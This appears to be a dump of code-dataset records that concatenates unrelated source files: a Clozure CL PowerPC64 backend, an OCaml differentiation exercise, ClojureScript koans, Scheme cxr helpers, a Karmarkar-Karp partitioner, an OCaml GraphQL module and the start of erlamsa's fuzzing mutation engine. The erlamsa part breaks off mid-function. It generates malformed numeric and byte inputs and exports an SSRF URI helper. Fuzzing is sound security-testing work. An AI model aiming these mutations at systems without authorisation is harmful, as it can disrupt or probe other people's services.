:bits-per-word 64)
#+linuxppc-target
'(:bits-per-word 64)
:ff-call-expand-function
#+linuxppc-target
'linux64::expand-ff-call
#+darwinppc-target
'darwin64::expand-ff-call
:ff-call-struct-return-by-implicit-arg-function
#+linuxppc-target
linux64::record-type-returns-structure-as-first-arg
#+darwinppc-target
darwin64::record-type-returns-structure-as-first-arg
:callback-bindings-function
#+linuxppc-target
linux64::generate-callback-bindings
#+darwinppc-target
darwin64::generate-callback-bindings
:callback-return-value-function
#+linuxppc-target
linux64::generate-callback-return-value
#+darwinppc-target
darwin64::generate-callback-return-value
)))
(install-standard-foreign-types ftd)
(use-interface-dir :libc ftd)
(setf (backend-target-foreign-type-data *ppc64-backend*) ftd)))
(pushnew *ppc64-backend* *known-backends* :key #'backend-name)
#+ppc64-target
(require "PPC64-VINSNS")
(provide "PPC64-BACKEND")
| null | https://raw.githubusercontent.com/fukamachi/clozure-cl/4b0c69452386ae57b08984ed815d9b50b4bcc8a2/compiler/PPC/PPC64/ppc64-backend.lisp | lisp | Package : CCL -*-
file "LICENSE". The LLGPL consists of a preamble and the LGPL,
conflict, the preamble takes precedence.
Clozure CL is referenced in the preamble as the "LIBRARY."
The LLGPL is also available online at
and a TOC, but it's not clear that we need to care about that
here.
Coerce SINGLE-FLOAT result to DOUBLE-FLOAT | Copyright ( C ) 2009 Clozure Associates
Copyright ( C ) 2004 , 2005 Clozure Associates
This file is part of Clozure CL .
Clozure CL is licensed under the terms of the Lisp Lesser GNU Public
License , known as the LLGPL and distributed with Clozure CL as the
which is distributed with Clozure CL as the file " LGPL " . Where these
(in-package "CCL")
(eval-when (:compile-toplevel :load-toplevel :execute)
(require "BACKEND"))
(eval-when (:compile-toplevel :execute)
(require "NXENV")
(require "PPCENV"))
Callbacks . Both LinuxPPC64 and follow something
close to the PowerOpen ABI . LinuxPPC uses transition vectors
(defun define-ppc64-poweropen-callback (name args body env)
(let* ((stack-word (gensym))
(stack-ptr (gensym))
(fp-arg-regs (gensym))
(fp-arg-num 0)
(arg-names ())
(arg-types ())
(return-type :void)
(args args)
(woi nil)
(monitor nil)
(dynamic-extent-names ())
(error-return nil))
(loop
(when (null args) (return))
(when (null (cdr args))
(setq return-type (car args))
(return))
(if (eq (car args) :without-interrupts)
(setq woi (cadr args) args (cddr args))
(if (eq (car args) :monitor-exception-ports)
(setq monitor (cadr args) args (cddr args))
(if (eq (car args) :error-return)
(setq error-return
(cadr args)
args (cddr args))
(progn
(push (foreign-type-to-representation-type (pop args)) arg-types)
(push (pop args) arg-names))))))
(setq arg-names (nreverse arg-names)
arg-types (nreverse arg-types))
(setq return-type (foreign-type-to-representation-type return-type))
(when (eq return-type :void)
(setq return-type nil))
(let* ((offset 0)
(need-stack-pointer (or arg-names return-type error-return))
(lets
(mapcar
#'(lambda (name type)
(let* ((delta 8)
(bias 0)
(use-fp-args nil))
(prog1
(list name
`(,
(if (typep type 'unsigned-byte)
(progn (setq delta (* 8 type)) '%inc-ptr)
(ecase type
(:single-float
(if (< (incf fp-arg-num) 14)
(progn
(setq use-fp-args t)
'%get-single-float-from-double-ptr)
(progn
(setq bias 4)
'%get-single-float)))
(:double-float
(setq delta 8)
(if (< (incf fp-arg-num) 14)
(setq use-fp-args t))
'%get-double-float)
(:signed-doubleword (setq delta 8) '%%get-signed-longlong)
(:signed-fullword
(setq bias 4)
'%get-signed-long)
(:signed-halfword (setq bias 6)
'%get-signed-word)
(:signed-byte (setq bias 7)
'%get-signed-byte)
(:unsigned-doubleword (setq delta 8) '%%get-unsigned-longlong)
(:unsigned-fullword
(setq bias 4)
'%get-unsigned-long)
(:unsigned-halfword
(setq bias 6)
'%get-unsigned-word)
(:unsigned-byte
(setq bias 7)
'%get-unsigned-byte)
(:address '%get-ptr)))
,(if use-fp-args fp-arg-regs stack-ptr)
,(if use-fp-args (* 8 (1- fp-arg-num))
`(+ ,offset ,bias))))
(when (or (eq type :address)
(typep type 'unsigned-byte))
(push name dynamic-extent-names))
(incf offset delta))))
arg-names arg-types)))
(multiple-value-bind (body decls doc) (parse-body body env t)
`(progn
(declaim (special ,name))
(define-callback-function
(nfunction ,name
(lambda (,stack-word)
(declare (ignorable ,stack-word))
(block ,name
(with-macptrs (,@(and need-stack-pointer (list `(,stack-ptr))))
,(when need-stack-pointer
`(%setf-macptr-to-object ,stack-ptr ,stack-word))
,(defcallback-body stack-ptr lets dynamic-extent-names
decls body return-type error-return
(- ppc64::c-frame.savelr ppc64::c-frame.param0)
fp-arg-regs
)))))
,doc
,woi
,monitor))))))
(defun defcallback-body-ppc64-poweropen (stack-ptr lets dynamic-extent-names decls body return-type error-return error-delta fp-arg-ptr)
(let* ((result (gensym))
(result-ptr (case return-type
((:single-float :double-float) fp-arg-ptr)
(t stack-ptr)))
(condition-name (if (atom error-return) 'error (car error-return)))
(error-return-function (if (atom error-return) error-return (cadr error-return)))
(body
`(with-macptrs ((,fp-arg-ptr (%get-ptr ,stack-ptr (- ppc64::c-frame.unused-1 ppc64::c-frame.param0))))
(declare (ignorable ,fp-arg-ptr))
(let ,lets
(declare (dynamic-extent ,@dynamic-extent-names))
,@decls
(let ((,result (progn ,@body)))
(declare (ignorable ,result))
,@(progn
(when (eq return-type :single-float)
(setq result `(float ,result 0.0d0)))
nil)
,(when return-type
`(setf (,
(case return-type
(:address '%get-ptr)
(:signed-doubleword '%%get-signed-longlong)
(:unsigned-doubleword '%%get-unsigned-longlong)
((:double-float :single-float) '%get-double-float)
(t '%%get-signed-longlong )) ,result-ptr 0) ,result)))))))
(if error-return
(let* ((cond (gensym)))
`(handler-case ,body
(,condition-name (,cond) (,error-return-function ,cond ,stack-ptr (%inc-ptr ,stack-ptr ,error-delta)))))
body)))
(defvar *ppc64-vinsn-templates* (make-hash-table :test #'eq))
(defvar *known-ppc64-backends* ())
#+linuxppc-target
(defvar *linuxppc64-backend*
(make-backend :lookup-opcode #'lookup-ppc-opcode
:lookup-macro #'ppc::ppc-macro-function
:lap-opcodes ppc::*ppc-opcodes*
:define-vinsn 'define-ppc-vinsn
:platform-syscall-mask (logior platform-os-linux platform-cpu-ppc)
:p2-dispatch *ppc2-specials*
:p2-vinsn-templates *ppc64-vinsn-templates*
:p2-template-hash-name '*ppc64-vinsn-templates*
:p2-compile 'ppc2-compile
:target-specific-features
'(:powerpc :ppc-target :poweropen-target :linux-target :linuxppc-target :ppc64-target :64-bit-target :big-endian-target)
:target-fasl-pathname (make-pathname :type "p64fsl")
:target-platform (logior platform-cpu-ppc
platform-os-linux
platform-word-size-64)
:target-os :linuxppc
:name :linuxppc64
:target-arch-name :ppc64
:target-foreign-type-data nil
:target-arch ppc64::*ppc64-target-arch*
:define-callback 'define-ppc64-poweropen-callback
:defcallback-body 'defcallback-body-ppc64-poweropen
))
#+darwinppc-target
(defvar *darwinppc64-backend*
(make-backend :lookup-opcode #'lookup-ppc-opcode
:lookup-macro #'ppc::ppc-macro-function
:lap-opcodes ppc::*ppc-opcodes*
:define-vinsn 'define-ppc-vinsn
:platform-syscall-mask (logior platform-os-darwin platform-cpu-ppc)
:p2-dispatch *ppc2-specials*
:p2-vinsn-templates *ppc64-vinsn-templates*
:p2-template-hash-name '*ppc64-vinsn-templates*
:p2-compile 'ppc2-compile
:target-specific-features
'(:powerpc :ppc-target :darwin-target :darwinppc-target :ppc64-target :64-bit-target :big-endian-target)
:target-fasl-pathname (make-pathname :type "d64fsl")
:target-platform (logior platform-cpu-ppc
platform-os-darwin
platform-word-size-64)
:target-os :darwinppc
:name :darwinppc64
:target-arch-name :ppc64
:target-foreign-type-data nil
:target-arch ppc64::*ppc64-target-arch*
:define-callback 'define-ppc64-poweropen-callback
:defcallback-body 'defcallback-body-ppc64-poweropen))
#+linuxppc-target
(pushnew *linuxppc64-backend* *known-ppc64-backends* :key #'backend-name)
#+darwinppc-target
(pushnew *darwinppc64-backend* *known-ppc64-backends* :key #'backend-name)
(defvar *ppc64-backend* (car *known-ppc64-backends*))
(defun fixup-ppc64-backend ()
(dolist (b *known-ppc64-backends*)
(setf (backend-lap-opcodes b) ppc::*ppc-opcodes*
(backend-p2-dispatch b) *ppc2-specials*
(backend-p2-vinsn-templates b) *ppc64-vinsn-templates*)
(or (backend-lap-macros b) (setf (backend-lap-macros b)
(make-hash-table :test #'equalp)))))
(fixup-ppc64-backend)
#+ppc64-target
(setq *host-backend* *ppc64-backend* *target-backend* *ppc64-backend*)
#-ppc64-target
(unless (backend-target-foreign-type-data *ppc64-backend*)
(let* ((ftd (make-ftd
:interface-db-directory
#+darwinppc-target "ccl:darwin-headers64;"
#+linuxppc-target "ccl:headers64;"
:interface-package-name
#+darwinppc-target "DARWIN64"
#+linuxppc-target "LINUX64"
:attributes
#+darwinppc-target
'(:signed-char t
:struct-by-value t
:struct-return-in-registers t
:struct-return-explicit t
:struct-by-value-by-field t
:prepend-underscores t
:bits-per-word 64)
#+linuxppc-target
'(:bits-per-word 64)
:ff-call-expand-function
#+linuxppc-target
'linux64::expand-ff-call
#+darwinppc-target
'darwin64::expand-ff-call
:ff-call-struct-return-by-implicit-arg-function
#+linuxppc-target
linux64::record-type-returns-structure-as-first-arg
#+darwinppc-target
darwin64::record-type-returns-structure-as-first-arg
:callback-bindings-function
#+linuxppc-target
linux64::generate-callback-bindings
#+darwinppc-target
darwin64::generate-callback-bindings
:callback-return-value-function
#+linuxppc-target
linux64::generate-callback-return-value
#+darwinppc-target
darwin64::generate-callback-return-value
)))
(install-standard-foreign-types ftd)
(use-interface-dir :libc ftd)
(setf (backend-target-foreign-type-data *ppc64-backend*) ftd)))
(pushnew *ppc64-backend* *known-backends* :key #'backend-name)
#+ppc64-target
(require "PPC64-VINSNS")
(provide "PPC64-BACKEND")
|
5ba0d8795e777e6d18f2d535aba7bdb1489d76c273aa38e7b7f8b5b9101952c7 | kupl/LearnML | original.ml | type aexp =
| Const of int
| Var of string
| Power of (string * int)
| Times of aexp list
| Sum of aexp list
(* Symbolic differentiation of [e] with respect to the variable [x].
   Bug fix: the recursive calls previously passed the literal string "x"
   instead of the parameter [x], so the result was wrong whenever the
   differentiation variable was not named "x". *)
let rec diff ((e : aexp), (x : string)) : aexp =
  match e with
  | Const i -> Const 0
  | Var s -> if s = x then Const 1 else Const 0
  | Power (s, i) ->
      if s = x then Times [ Const i; Power (s, i - 1) ] else Const 0
  | Times l -> (
      match l with
      | [] -> Const 0
      | hd :: tl ->
          (* product rule: (hd * rest)' = hd' * rest + hd * rest' *)
          Sum
            [ Times (diff (hd, x) :: tl); Times [ hd; diff (Times tl, x) ] ]
      )
  | Sum l -> (
      match l with
      | [] -> Const 0
      (* sum rule: differentiate head and the remaining sum *)
      | hd :: tl -> Sum [ diff (hd, x); diff (Sum tl, x) ] )
| null | https://raw.githubusercontent.com/kupl/LearnML/c98ef2b95ef67e657b8158a2c504330e9cfb7700/result/cafe2/diff/sub146/original.ml | ocaml | type aexp =
| Const of int
| Var of string
| Power of (string * int)
| Times of aexp list
| Sum of aexp list
(* Symbolic differentiation of [e] with respect to the variable [x].
   Bug fix: the recursive calls previously passed the literal string "x"
   instead of the parameter [x], so the result was wrong whenever the
   differentiation variable was not named "x". *)
let rec diff ((e : aexp), (x : string)) : aexp =
  match e with
  | Const i -> Const 0
  | Var s -> if s = x then Const 1 else Const 0
  | Power (s, i) ->
      if s = x then Times [ Const i; Power (s, i - 1) ] else Const 0
  | Times l -> (
      match l with
      | [] -> Const 0
      | hd :: tl ->
          (* product rule: (hd * rest)' = hd' * rest + hd * rest' *)
          Sum
            [ Times (diff (hd, x) :: tl); Times [ hd; diff (Times tl, x) ] ]
      )
  | Sum l -> (
      match l with
      | [] -> Const 0
      (* sum rule: differentiate head and the remaining sum *)
      | hd :: tl -> Sum [ diff (hd, x); diff (Sum tl, x) ] )
| |
c199caabbb6c58add1824ef6266f5e313591cfdc8147336e7210313d8440384f | lazerwalker/clojurescript-koans | 14_destructuring.cljs | (ns koans.meditations.destructuring)
;; Koan exercises for destructuring: a quoted list alternating a
;; description string with an expression whose :__ placeholders the
;; student must fill in.  The placeholders are intentional — do not
;; "fix" them.
(def koans '(
  "Destructuring is an arbiter: it breaks up arguments"
  (= :__ ((fn [[a b]] (str b a))
     [:foo :bar]))
  "Whether in function definitions"
  (= (str "First comes love, "
          "then comes marriage, "
          "then comes Clojure with the baby carriage")
     ((fn [[a b c]] :__)
      ["love" "marriage" "Clojure"]))
  "Or in let expressions"
  (= "Rich Hickey aka The Clojurer aka Go Time aka Macro Killah"
     (let [[first-name last-name & aliases]
           (list "Rich" "Hickey" "The Clojurer" "Go Time" "Macro Killah")]
       :__))
  "You can regain the full argument if you like arguing"
  (= {:original-parts ["Stephen" "Hawking"] :named-parts {:first "Stephen" :last "Hawking"}}
     (let [[first-name last-name :as full-name] ["Stephen" "Hawking"]]
       :__))
  "Break up maps by key"
  (= "123 Test Lane, Testerville, TX"
     (let [{street-address :street-address, city :city, state :state} test-address]
       :__))
  "Or more succinctly"
  (= "123 Test Lane, Testerville, TX"
     (let [{:keys [street-address :__]} test-address]
       :__))
  "All together now!"
  ;; test-address is defined in the fns vector below at runtime.
  (= "Test Testerson, 123 Test Lane, Testerville, TX"
     (:__ ["Test" "Testerson"] test-address))
  ))
(def fns [
"(def test-address
{:street-address \"123 Test Lane\"
:city \"Testerville\"
:state \"TX\"})"
])
| null | https://raw.githubusercontent.com/lazerwalker/clojurescript-koans/c4713e3ccafad2229c5eae038d8bbf433d0d026e/src/koans/meditations/14_destructuring.cljs | clojure | (ns koans.meditations.destructuring)
(def koans '(
"Destructuring is an arbiter: it breaks up arguments"
(= :__ ((fn [[a b]] (str b a))
[:foo :bar]))
"Whether in function definitions"
(= (str "First comes love, "
"then comes marriage, "
"then comes Clojure with the baby carriage")
((fn [[a b c]] :__)
["love" "marriage" "Clojure"]))
"Or in let expressions"
(= "Rich Hickey aka The Clojurer aka Go Time aka Macro Killah"
(let [[first-name last-name & aliases]
(list "Rich" "Hickey" "The Clojurer" "Go Time" "Macro Killah")]
:__))
"You can regain the full argument if you like arguing"
(= {:original-parts ["Stephen" "Hawking"] :named-parts {:first "Stephen" :last "Hawking"}}
(let [[first-name last-name :as full-name] ["Stephen" "Hawking"]]
:__))
"Break up maps by key"
(= "123 Test Lane, Testerville, TX"
(let [{street-address :street-address, city :city, state :state} test-address]
:__))
"Or more succinctly"
(= "123 Test Lane, Testerville, TX"
(let [{:keys [street-address :__]} test-address]
:__))
"All together now!"
(= "Test Testerson, 123 Test Lane, Testerville, TX"
(:__ ["Test" "Testerson"] test-address))
))
(def fns [
"(def test-address
{:street-address \"123 Test Lane\"
:city \"Testerville\"
:state \"TX\"})"
])
| |
af84783febca53a593eba5e03f7c72adfd41b25e0bf151194bbcf61856c284f3 | ashinn/chibi-scheme | cxr.scm |
;; provide c[ad]{3,4}r
;; Three-level car/cdr compositions (c[ad]^3 r).
(define (caaar x) (car (car (car x))))
(define (caadr x) (car (car (cdr x))))
(define (cadar x) (car (cdr (car x))))
(define (caddr x) (car (cdr (cdr x))))
(define (cdaar x) (cdr (car (car x))))
(define (cdadr x) (cdr (car (cdr x))))
(define (cddar x) (cdr (cdr (car x))))
(define (cdddr x) (cdr (cdr (cdr x))))
;; Four-level car/cdr compositions (c[ad]^4 r).
(define (caaaar x) (car (car (car (car x)))))
(define (caaadr x) (car (car (car (cdr x)))))
(define (caadar x) (car (car (cdr (car x)))))
(define (caaddr x) (car (car (cdr (cdr x)))))
(define (cadaar x) (car (cdr (car (car x)))))
(define (cadadr x) (car (cdr (car (cdr x)))))
(define (caddar x) (car (cdr (cdr (car x)))))
(define (cadddr x) (car (cdr (cdr (cdr x)))))
(define (cdaaar x) (cdr (car (car (car x)))))
(define (cdaadr x) (cdr (car (car (cdr x)))))
(define (cdadar x) (cdr (car (cdr (car x)))))
(define (cdaddr x) (cdr (car (cdr (cdr x)))))
(define (cddaar x) (cdr (cdr (car (car x)))))
(define (cddadr x) (cdr (cdr (car (cdr x)))))
(define (cdddar x) (cdr (cdr (cdr (car x)))))
(define (cddddr x) (cdr (cdr (cdr (cdr x)))))
| null | https://raw.githubusercontent.com/ashinn/chibi-scheme/8b27ce97265e5028c61b2386a86a2c43c1cfba0d/lib/scheme/cxr.scm | scheme | provide c[ad]{3,4}r |
;; Three-level car/cdr compositions (c[ad]^3 r).
(define (caaar x) (car (car (car x))))
(define (caadr x) (car (car (cdr x))))
(define (cadar x) (car (cdr (car x))))
(define (caddr x) (car (cdr (cdr x))))
(define (cdaar x) (cdr (car (car x))))
(define (cdadr x) (cdr (car (cdr x))))
(define (cddar x) (cdr (cdr (car x))))
(define (cdddr x) (cdr (cdr (cdr x))))
;; Four-level car/cdr compositions (c[ad]^4 r).
(define (caaaar x) (car (car (car (car x)))))
(define (caaadr x) (car (car (car (cdr x)))))
(define (caadar x) (car (car (cdr (car x)))))
(define (caaddr x) (car (car (cdr (cdr x)))))
(define (cadaar x) (car (cdr (car (car x)))))
(define (cadadr x) (car (cdr (car (cdr x)))))
(define (caddar x) (car (cdr (cdr (car x)))))
(define (cadddr x) (car (cdr (cdr (cdr x)))))
(define (cdaaar x) (cdr (car (car (car x)))))
(define (cdaadr x) (cdr (car (car (cdr x)))))
(define (cdadar x) (cdr (car (cdr (car x)))))
(define (cdaddr x) (cdr (car (cdr (cdr x)))))
(define (cddaar x) (cdr (cdr (car (car x)))))
(define (cddadr x) (cdr (cdr (car (cdr x)))))
(define (cdddar x) (cdr (cdr (cdr (car x)))))
(define (cddddr x) (cdr (cdr (cdr (cdr x)))))
|
a869aa2c4bf67c93b36f44eb36c6b184bf872301399ac900b0acac6ab4671fd7 | marcoheisig/Petalisp | karmarkar-karp.lisp | © 2016 - 2023 - license : GNU AGPLv3 -*- coding : utf-8 -*-
(defpackage #:petalisp.karmarkar-karp
(:use #:common-lisp #:petalisp.utilities))
(in-package #:petalisp.karmarkar-karp)
;; A function that returns the weight of an object being processed.
(defvar *weight*)
;; The number of partitions to be created.
(defvar *k*)
(defstruct (subset
(:constructor make-subset))
(elements '() :type list)
(weight 0 :type real))
(defun combine-subsets (subset1 subset2)
(make-subset
:elements (append (subset-elements subset1)
(subset-elements subset2))
:weight (+ (subset-weight subset1)
(subset-weight subset2))))
(defstruct (tuple
(:constructor make-tuple))
(subsets #() :type simple-vector)
(weight 0 :type number))
(defun tuple-subset (tuple index)
(svref (tuple-subsets tuple) index))
(defun tuple-from-object (object)
(let ((subsets (make-array *k*))
(weight (funcall *weight* object)))
(setf (aref subsets 0)
(make-subset
:elements (list object)
:weight weight))
(loop for index from 1 below *k* do
(setf (aref subsets index)
(make-subset :elements '() :weight 0)))
(make-tuple
:subsets subsets
:weight weight)))
(defun tuple> (tuple1 tuple2)
(> (tuple-weight tuple1)
(tuple-weight tuple2)))
;; Karmarkar-Karp combination step: merge two k-tuples by pairing the
;; i-th heaviest subset of one with the i-th lightest of the other, so
;; large piles are topped up with small ones.
(defun combine-tuples (tuple1 tuple2)
  (let ((subsets (make-array *k*)))
    (loop for index below *k* do
      (setf (svref subsets index)
            (combine-subsets
             (tuple-subset tuple1 index)
             (tuple-subset tuple2 (- *k* index 1)))))
    ;; Keep the subsets sorted heaviest-first; the tuple's weight is the
    ;; spread between its heaviest and lightest subset.
    (setf subsets (sort subsets #'> :key #'subset-weight))
    (make-tuple
     :subsets subsets
     :weight (- (subset-weight (svref subsets 0))
                (subset-weight (svref subsets (1- *k*)))))))
(defun karmarkar-karp (S k &key (weight #'identity))
  "Partition the set of objects S in k subsets such that the sums of the
weights of the objects in each subset are nearly equal.

Returns a vector of length k whose elements are lists that partition S.  As
a second value, returns the difference between the sum of the weights of
the smallest partition and that of the largest partition."
  ;; Degenerate case: nothing to partition -> K empty subsets, zero spread.
  ;; (Previously this returned a LIST and no second value, contradicting
  ;; the vector-plus-spread contract of the main path below.)
  (when (null S)
    (return-from karmarkar-karp
      (values (make-array k :initial-element '()) 0)))
  (let ((*weight* weight)
        (*k* k)
        (queue (queues:make-queue :priority-queue :compare #'tuple>)))
    ;; Largest-differencing method: repeatedly pop the two tuples with the
    ;; biggest weight spread and combine them until one tuple remains.
    (dolist (object S)
      (queues:qpush queue (tuple-from-object object)))
    (loop until (= (queues:qsize queue) 1) do
      (queues:qpush queue (combine-tuples (queues:qpop queue) (queues:qpop queue))))
    (let ((result (queues:qpop queue)))
      (values
       (map 'vector #'subset-elements (tuple-subsets result))
       (tuple-weight result)))))
| null | https://raw.githubusercontent.com/marcoheisig/Petalisp/a1c85cf71da445ef9c7913cd9ddb5149373211a7/code/utilities/karmarkar-karp.lisp | lisp | A function that returns the weight of an object being processed.
The number of partitions to be created. | © 2016 - 2023 - license : GNU AGPLv3 -*- coding : utf-8 -*-
(defpackage #:petalisp.karmarkar-karp
(:use #:common-lisp #:petalisp.utilities))
(in-package #:petalisp.karmarkar-karp)
(defvar *weight*)
(defvar *k*)
(defstruct (subset
(:constructor make-subset))
(elements '() :type list)
(weight 0 :type real))
(defun combine-subsets (subset1 subset2)
(make-subset
:elements (append (subset-elements subset1)
(subset-elements subset2))
:weight (+ (subset-weight subset1)
(subset-weight subset2))))
(defstruct (tuple
(:constructor make-tuple))
(subsets #() :type simple-vector)
(weight 0 :type number))
(defun tuple-subset (tuple index)
(svref (tuple-subsets tuple) index))
(defun tuple-from-object (object)
(let ((subsets (make-array *k*))
(weight (funcall *weight* object)))
(setf (aref subsets 0)
(make-subset
:elements (list object)
:weight weight))
(loop for index from 1 below *k* do
(setf (aref subsets index)
(make-subset :elements '() :weight 0)))
(make-tuple
:subsets subsets
:weight weight)))
(defun tuple> (tuple1 tuple2)
(> (tuple-weight tuple1)
(tuple-weight tuple2)))
;; Karmarkar-Karp combination step: merge two k-tuples by pairing the
;; i-th heaviest subset of one with the i-th lightest of the other, so
;; large piles are topped up with small ones.
(defun combine-tuples (tuple1 tuple2)
  (let ((subsets (make-array *k*)))
    (loop for index below *k* do
      (setf (svref subsets index)
            (combine-subsets
             (tuple-subset tuple1 index)
             (tuple-subset tuple2 (- *k* index 1)))))
    ;; Keep the subsets sorted heaviest-first; the tuple's weight is the
    ;; spread between its heaviest and lightest subset.
    (setf subsets (sort subsets #'> :key #'subset-weight))
    (make-tuple
     :subsets subsets
     :weight (- (subset-weight (svref subsets 0))
                (subset-weight (svref subsets (1- *k*)))))))
(defun karmarkar-karp (S k &key (weight #'identity))
"Partition the set of objects S in k subsets such that the sums of the
weights of the objects in each subset are nearly equal.
Returns a vector of length k whose elements are lists that partition S. As
a second value, returns the difference between the sum of the weights of
the smalles partition and that of the largest partition."
(when (null S)
(return-from karmarkar-karp (make-list k :initial-element '())))
(let ((*weight* weight)
(*k* k)
(queue (queues:make-queue :priority-queue :compare #'tuple>)))
(dolist (object S)
(queues:qpush queue (tuple-from-object object)))
(loop until (= (queues:qsize queue) 1) do
(queues:qpush queue (combine-tuples (queues:qpop queue) (queues:qpop queue))))
(let ((result (queues:qpop queue)))
(values
(map 'vector #'subset-elements (tuple-subsets result))
(tuple-weight result)))))
|
5b6dac56d7c700488660f3f574940eff955e13b6ca6713ea6659626c7eae9bae | andreas/ocaml-graphql-server | graphql.ml | module Schema =
Graphql_schema.Make
(struct
type +'a t = 'a
let bind t f = f t
let return t = t
module Stream = struct
type 'a t = 'a Seq.t
let map t f = Seq.map f t
let iter t f = Seq.iter f t
let close _t = ()
end
end)
(struct
type t = string
let message_of_field_error t = t
let extensions_of_field_error _t = None
end)
| null | https://raw.githubusercontent.com/andreas/ocaml-graphql-server/d615cbb164d4ddfdc2efeb246a198dfe114adf24/graphql/src/graphql.ml | ocaml | module Schema =
Graphql_schema.Make
(struct
type +'a t = 'a
let bind t f = f t
let return t = t
module Stream = struct
type 'a t = 'a Seq.t
let map t f = Seq.map f t
let iter t f = Seq.iter f t
let close _t = ()
end
end)
(struct
type t = string
let message_of_field_error t = t
let extensions_of_field_error _t = None
end)
| |
0286b5702c3ea5f7a12fb5140e6f65b004b9c065ecfbaf8e4e0560f4131eaede | informatimago/lisp | hello.lisp | (defpackage "H"
(:use "CL")
(:export "ELLO"))
(in-package "H")
(defun ello ()
(prin1 'hello))
| null | https://raw.githubusercontent.com/informatimago/lisp/571af24c06ba466e01b4c9483f8bb7690bc46d03/driver/test-ll/hello.lisp | lisp | (defpackage "H"
(:use "CL")
(:export "ELLO"))
(in-package "H")
(defun ello ()
(prin1 'hello))
| |
eba99a910bdf2607b8ad23e9c41a85c381b1af6425bb39e1d1e096e4d76702ed | Darkkey/erlamsa | erlamsa_mutations.erl | Copyright ( c ) 2011 - 2014
Copyright ( c ) 2014 - 2019
%
% Permission is hereby granted, free of charge, to any person obtaining a copy
% of this software and associated documentation files (the "Software"), to deal
in the Software without restriction , including without limitation the rights
% to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software , and to permit persons to whom the Software is
% furnished to do so, subject to the following conditions:
%
% The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software .
%
THE SOFTWARE IS PROVIDED " AS IS " , WITHOUT WARRANTY OF ANY KIND , EXPRESS OR
% IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
% FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
% SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
DAMAGES OR OTHER LIABILITY , WHETHER IN AN ACTION OF CONTRACT , TORT OR
% OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR
% THE USE OR OTHER DEALINGS IN THE SOFTWARE.
%
%%%-------------------------------------------------------------------
%%% @author dark_k3y
%%% @doc
%%% Mutations definitions.
%%% @end
%%%-------------------------------------------------------------------
-module(erlamsa_mutations).
-author("dark_k3y").
-ifdef(TEST).
-include_lib("eunit/include/eunit.hrl").
-compile([export_all]).
-endif.
-include("erlamsa.hrl").
%% API
-export([make_mutator/2, mutators_mutator/1, mutations/0, mutations/1, default/1, tostring/1,
get_max_score/0, inner_mutations/1, get_ssrf_uri/0, basic_type_mutation/2]).
-define(MIN_SCORE, 2.0).
-define(MAX_SCORE, 10.0).
-define(RAND_DELTA, 18446744073709551616).
-type byte_edit_fun() :: fun((byte()) -> binary()).
-type text_mutators() :: insert_badness | replace_badness | insert_aaas | insert_null | insert_delimeter.
%% return maximum possible score value
-spec get_max_score() -> float().
get_max_score() ->
?MAX_SCORE.
-spec edit_byte_vector(binary(), non_neg_integer(), byte_edit_fun()) -> binary().
%% clone a byte vector and edit at given position
%% Fun receives the byte at Pos (0-based) and returns the binary that
%% replaces it (it may be empty, one byte, or several bytes).
edit_byte_vector(Empty = <<>>, _Pos, _Fun) -> Empty;
edit_byte_vector(BVec, EditPos, Fun) ->
    <<Head:EditPos/binary, Old:8, Rest/binary>> = BVec,
    Patched = Fun(Old),
    <<Head/binary, Patched/binary, Rest/binary>>.
%%%
%%% Number Mutator
%%%
-spec interesting_numbers() -> list(integer()).
%% Powers of two around common integer-width boundaries, each with its
%% off-by-one neighbours; ordered from the widest boundary down.
interesting_numbers() ->
    Widths = [1, 7, 8, 15, 16, 31, 32, 63, 64, 127, 128],
    lists:flatmap(
        fun (I) ->
            X = 1 bsl I,
            [X - 1, X, X + 1]
        end,
        lists:reverse(Widths)).
-spec sign(integer()) -> integer().
%% Sign of X, with zero counted as positive.
sign(X) ->
    case X < 0 of
        true  -> -1;
        false -> 1
    end.
-spec mutate_float(float()) -> float().
mutate_float(Num) -> mutate_float(Num, erlamsa_rnd:rand(7)).
-spec mutate_float(float(), 0..7) -> float().
mutate_float(Num, 0) -> -Num;
mutate_float(_, 1) -> 0.0;
mutate_float(_, 2) -> 1.0;
mutate_float(_, 3) -> 1.0e-323;
mutate_float(_, 4) -> 1.0e308;
mutate_float(_, _) -> erlamsa_rnd:rand_float() * math:exp(100*erlamsa_rnd:rand_float()).
-spec mutate_num(integer()) -> integer().
%% Mutate an integer by picking one of the strategies below at random.
mutate_num(Num) -> mutate_num(Num, erlamsa_rnd:rand(12)).
-spec mutate_num(integer(), 0..12) -> integer().
%% Strategies: off-by-one, constants 0/1, "interesting" boundary numbers,
%% offsets by boundary numbers, random offsets, negation.  Note that
%% selector values 6 and 11 both fall through to the last clause.
mutate_num(Num, 0) -> Num + 1;
mutate_num(Num, 1) -> Num - 1;
mutate_num(_, 2) -> 0;
mutate_num(_, 3) -> 1;
mutate_num(_, N) when N > 3 andalso N < 6 -> erlamsa_rnd:rand_elem(interesting_numbers());
mutate_num(Num, 7) -> Num + erlamsa_rnd:rand_elem(interesting_numbers());
mutate_num(Num, 8) -> Num - erlamsa_rnd:rand_elem(interesting_numbers());
%% Random offset scaled to the magnitude of Num, pulled towards zero.
mutate_num(Num, 9) -> Num - erlamsa_rnd:rand(erlang:abs(Num)*2) * sign(Num);
mutate_num(Num, 10) -> -Num; %% TODO: verify that this is useful
%% Fallback: add or subtract a log-distributed random delta.
mutate_num(Num, _) ->
    N = erlamsa_rnd:rand_range(1, 129),
    L = erlamsa_rnd:rand_log(N),
    S = erlamsa_rnd:rand(3),
    case S of
        0 -> Num - L;
        _Else -> Num + L
    end.
-spec get_num(binary()) -> {integer() | false, binary()}.
%% Parse a (possibly negative) decimal integer prefix of Bin; returns
%% {Value, Remainder}, or {false, Remainder} when no digit was seen.
get_num(Bin) -> get_num(Bin, 0, 0, 1).
-spec get_num(binary(), integer(), non_neg_integer(), 1 | -1) -> {integer() | false, binary()}.
get_num(<<>>, _Acc, 0, _Sign) -> {false, <<>>};
get_num(<<>>, Acc, _Digits, Sign) -> {Sign * Acc, <<>>};
get_num(<<C:8, Rest/binary>>, Acc, Digits, Sign) when C >= $0, C =< $9 ->
